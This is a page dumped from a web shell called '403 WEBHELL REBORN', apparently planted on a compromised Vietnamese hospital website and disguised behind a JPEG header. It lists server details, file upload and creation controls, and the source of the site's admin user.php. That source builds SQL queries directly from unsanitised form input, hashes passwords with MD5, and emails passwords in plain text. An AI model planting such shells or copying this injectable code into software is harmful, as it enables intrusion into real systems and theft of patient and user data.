ÿØÿà JFIF  ` ` ÿþš 403 WEBHELL REBORN
403 WEBHELL REBORN
Server : Apache/2
System : Linux vps.phamthanh.local 3.10.0-1160.102.1.el7.x86_64 #1 SMP Tue Oct 17 15:42:21 UTC 2023 x86_64
User : benhviencoc7 ( 1008)
PHP Version : 5.6.40
Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
Directory :  /home/benhviencoc7/domains/benhviendkkvcampha.vn/public_html/adminvn/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

Buat Folder Baru:
Buat File Baru:

Current File : /home/benhviencoc7/domains/benhviendkkvcampha.vn/public_html///////adminvn/user.php
<?php

/*----------------------------------------*\
|             Copyright © C-ILY            | 
|            Phone: 0983.998.994           |
|             Y!m: notepad.html            |
|         Email: truongpv87@gmail.com      |
\*----------------------------------------*/

define('CILY',true);
include('../#includes/config.php');
if(check_log() == true) {
    list($checkuser) = @mysql_fetch_array(@mysql_query("SELECT user_nick FROM cily_users WHERE user_nick = '".$_POST['nick']."'"));
    if($_GET['type'] == 'add' && check_level() >= 9 && strlen($_POST['nick']) > 3 && strlen($_POST['pass']) > 5 && $_POST['pass'] == $_POST['repass'] && strlen($_POST['name']) > 4 && strlen($_POST['email']) > 7){
        $salt = substr(str_shuffle(aBcEeFgHiJkLmNoPqRstUvWxYz0123456789),0, 20);
        $passcily = md5(md5($_POST['pass']).$salt);
        
        if($checkuser != NULL) {
            Redirect("Tên đăng nhập đã có người sử dụng, thực hiện không thành công",'index.php?m=11'); 
        } else {
        @mysql_query("INSERT INTO cily_users (user_nick, user_password, user_email, user_sex, user_phone, user_fullname, user_add, user_avatar, user_birthday, user_info, user_salt, user_class, user_level, user_regdate, user_lastvisit) VALUES ('".$_POST['nick']."', '".$passcily."', '".$_POST['email']."', ".$_POST['sex'].", ".$_POST['phone'].", '".$_POST['name']."', '".addsla($_POST['add'])."', '".$_POST['img']."', '".$_POST['dd']."-".$_POST['mm']."-".$_POST['yyyy']."', '".addsla($_POST['info'])."', '".$salt."', ".$_POST['class'].", ".$_POST['level'].", ".time().", ".time().")");

        $info_user = '<strong>Chào mừng bạn '.$_POST['name'].' đến với '.get_option('name').'<strong><br />Thông tin tài khoản:<br />Tên đăng nhập: '.$_POST['nick'].'<br />Mật khẩu: '.$_POST['pass'];
        @mail($_POST['email'],get_option('name').' | Thông tin tài khoản',$info_user.'<br />-------------------------------------------------------<br />'.get_option('name').'<br />Email: '.get_option('email').'<br />Website: '.URL_SITE,"From: ".get_option('email')."\r\nReply-To: ".get_option('email')."\r\nContent-type:text/html; charset=UTF-8\r\n\n\ ");

        header('Location: index.php?m=11');
    }
}

    elseif($_GET['type'] == 'edit' && check_level() >= 9 && strlen($_POST['name']) > 4 && strlen($_POST['email']) > 7 && $_POST['pass'] == NULL){
        if($_POST['nick'] != $_POST['nick1']) {
            if($checkuser != NULL) {
                Redirect("Tên đăng nhập đã có người sử dụng, thực hiện không thành công",'index.php?m=11&sm=3&id='.$_POST['iduser']); 
                }else {
                    @mysql_query("UPDATE cily_users SET user_nick = '".$_POST['nick']."', user_fullname = '".$_POST['name']."', user_email = '".$_POST['email']."', user_info = '".addsla($_POST['info'])."', user_birthday = '".$_POST['dd']."-".$_POST['mm']."-".$_POST['yyyy']."', user_sex = ".$_POST['sex'].", user_add = '".addsla($_POST['add'])."', user_avatar = '".$_POST['img']."', user_phone = '".$_POST['phone']."', user_class = ".$_POST['class'].", user_level = ".$_POST['level']." WHERE id = ".$_POST['id']);
                        Redirect("",'index.php?m=11&sm=3&id='.$_POST['iduser']); 
                }
        }else {
        @mysql_query("UPDATE cily_users SET user_nick = '".$_POST['nick']."', user_fullname = '".$_POST['name']."', user_email = '".$_POST['email']."', user_info = '".addsla($_POST['info'])."', user_birthday = '".$_POST['dd']."-".$_POST['mm']."-".$_POST['yyyy']."', user_sex = ".$_POST['sex'].", user_add = '".addsla($_POST['add'])."', user_avatar = '".$_POST['img']."', user_phone = '".$_POST['phone']."', user_class = ".$_POST['class'].", user_level = ".$_POST['level']." WHERE id = ".$_POST['id']);
        Redirect("",'index.php?m=11&sm=3&id='.$_POST['iduser']); 

    }
}
    elseif($_GET['type'] == 'edit' && check_level() >= 9 && strlen($_POST['name']) > 4 && strlen($_POST['email']) > 7){
        if($_POST['nick'] != $_POST['nick1']) {
            if($checkuser != NULL) {
                if ($_SESSION['link'] == NULL){header('index.php?m=11');}else {Redirect("Tên đăng nhập đã có","http://".$_SESSION['link']);}
                }else {
                    @mysql_query("UPDATE cily_users SET user_nick = '".$_POST['nick']."', user_fullname = '".$_POST['name']."', user_email = '".$_POST['email']."', user_info = '".addsla($_POST['info'])."', user_birthday = '".$_POST['dd']."-".$_POST['mm']."-".$_POST['yyyy']."', user_sex = ".$_POST['sex'].", user_add = ".addsla($_POST['add']).", user_avatar = '".$_POST['img']."', user_phone = ".$_POST['phone'].", user_class = ".$_POST['class'].", user_level = ".$_POST['level']." WHERE id = ".$_POST['id']);
                    if(strlen($_POST['pass']) > 5 & $_POST['pass'] == $_POST['repass']) @mysql_query("UPDATE cily_users SET user_password  = '".md5(md5($_POST['pass']).$_POST['salt'])."' WHERE id = ".$_POST['id']);
                        Redirect("",'index.php?m=11'); 
                }
        }else {
            @mysql_query("UPDATE cily_users SET user_nick = '".$_POST['nick']."', user_fullname = '".$_POST['name']."', user_email = '".$_POST['email']."', user_info = '".addsla($_POST['info'])."', user_birthday = '".$_POST['dd']."-".$_POST['mm']."-".$_POST['yyyy']."', user_sex = ".$_POST['sex'].", user_add = ".addsla($_POST['add']).", user_avatar = '".$_POST['img']."', user_phone = ".$_POST['phone'].", user_class = ".$_POST['class'].", user_level = ".$_POST['level']." WHERE id = ".$_POST['id']);
            if(strlen($_POST['pass']) > 5 & $_POST['pass'] == $_POST['repass']) @mysql_query("UPDATE cily_users SET user_password  = '".md5(md5($_POST['pass']).$_POST['salt'])."' WHERE id = ".$_POST['id']);
        Redirect("",'index.php?m=11'); 

    }

    }
    elseif($_GET['type'] == 'my' && strlen($_POST['name']) > 4 && strlen($_POST['email']) > 7 &&  $_POST['pass'] == NULL){
        
        @mysql_query("UPDATE cily_users SET user_fullname = '".$_POST['name']."', user_email = '".$_POST['email']."', user_info = '".addsla($_POST['info'])."', user_birthday = '".$_POST['dd']."-".$_POST['mm']."-".$_POST['yyyy']."', user_sex = ".$_POST['sex'].", user_add = '".addsla($_POST['add'])."', user_avatar = '".$_POST['img']."', user_phone = '".$_POST['phone']."' WHERE id = ".$_SESSION['user']['id']);

        Redirect("Thay đổi thành công",'index.php?m=13'); 
    }
    elseif($_GET['type'] == 'my' && strlen($_POST['name']) > 4 && strlen($_POST['email']) > 7){

        @mysql_query("UPDATE cily_users SET user_fullname = '".$_POST['name']."', user_email = '".$_POST['email']."', user_info = '".addsla($_POST['info'])."', user_birthday = '".$_POST['dd']."-".$_POST['mm']."-".$_POST['yyyy']."', user_sex = ".$_POST['sex'].", user_add = ".addsla($_POST['add']).", user_avatar = '".$_POST['img']."', user_phone = ".$_POST['phone']." WHERE id = ".$_SESSION['user']['id']);
        if(strlen($_POST['pass']) > 5 & $_POST['pass'] == $_POST['repass']) @mysql_query("UPDATE cily_users SET user_password  = '".md5(md5($_POST['pass']).$_POST['salt'])."' WHERE id = ".$_SESSION['user']['id']);
        header('Location: index.php?m=13');
    }
    
    elseif($_GET['type'] == 'del' && check_level() >= 9){
        $total = count($_POST['id']);
        for($i=0; $i<$total; $i++) {
            @mysql_query("DELETE FROM cily_users WHERE id = ".$_POST['id'][$i]);
        }
        header('Location: index.php?m=11');
    }
    
    else echo "Hacking attempt";
}

else {
    if($_GET['type'] == 'reg' && strlen($_POST['nick']) > 3 && strlen($_POST['pass']) > 5 && $_POST['pass'] == $_POST['repass'] && strlen($_POST['name']) > 4 && strlen($_POST['email']) > 7 && $_POST['captcha'] == $_SESSION['captcha']){
        list($check) = @mysql_fetch_array(@mysql_query("SELECT id FROM cily_users WHERE user_nick = '".$_POST['nick']."' or user_email = '".$_POST['email']."'"));
        if($check) header('Location: ../register.php?check=error');
        else {
            @mysql_query("INSERT INTO cily_users (user_nick, user_password, user_email, user_sex, user_fullname, user_birthday, user_info, user_class, user_regdate, user_lastvisit) VALUES ('".$_POST['nick']."', '".md5($_POST['pass'])."', '".$_POST['email']."', ".$_POST['sex'].", '".$_POST['name']."', '".$_POST['dd']."-".$_POST['mm']."-".$_POST['yyyy']."', '".$_POST['info']."', ".$_POST['class'].", ".time().", ".time().")");
            $info_user = '<strong>Chào mừng bạn '.$_POST['name'].' đến với '.get_option('name').'<strong><br />Thông tin tài khoản:<br />Tên đăng nhập: '.$_POST['nick'].'<br />Mật khẩu: '.$_POST['pass'];
            @mail($_POST['email'],get_option('name').' | Thông tin tài khoản',$info_user.'<br />-------------------------------------------------------<br />'.get_option('name').'<br />Email: '.get_option('email').'<br />Website: '.URL_SITE,"From: ".get_option('email')."\r\nReply-To: ".get_option('email')."\r\nContent-type:text/html; charset=UTF-8\r\n\n\ ");
            header('Location: ../login.php?nick='.$_POST['nick']);
        }        
    }
    
    else header('Location: ../register.php');
    
}


?>

Anon7 - 2021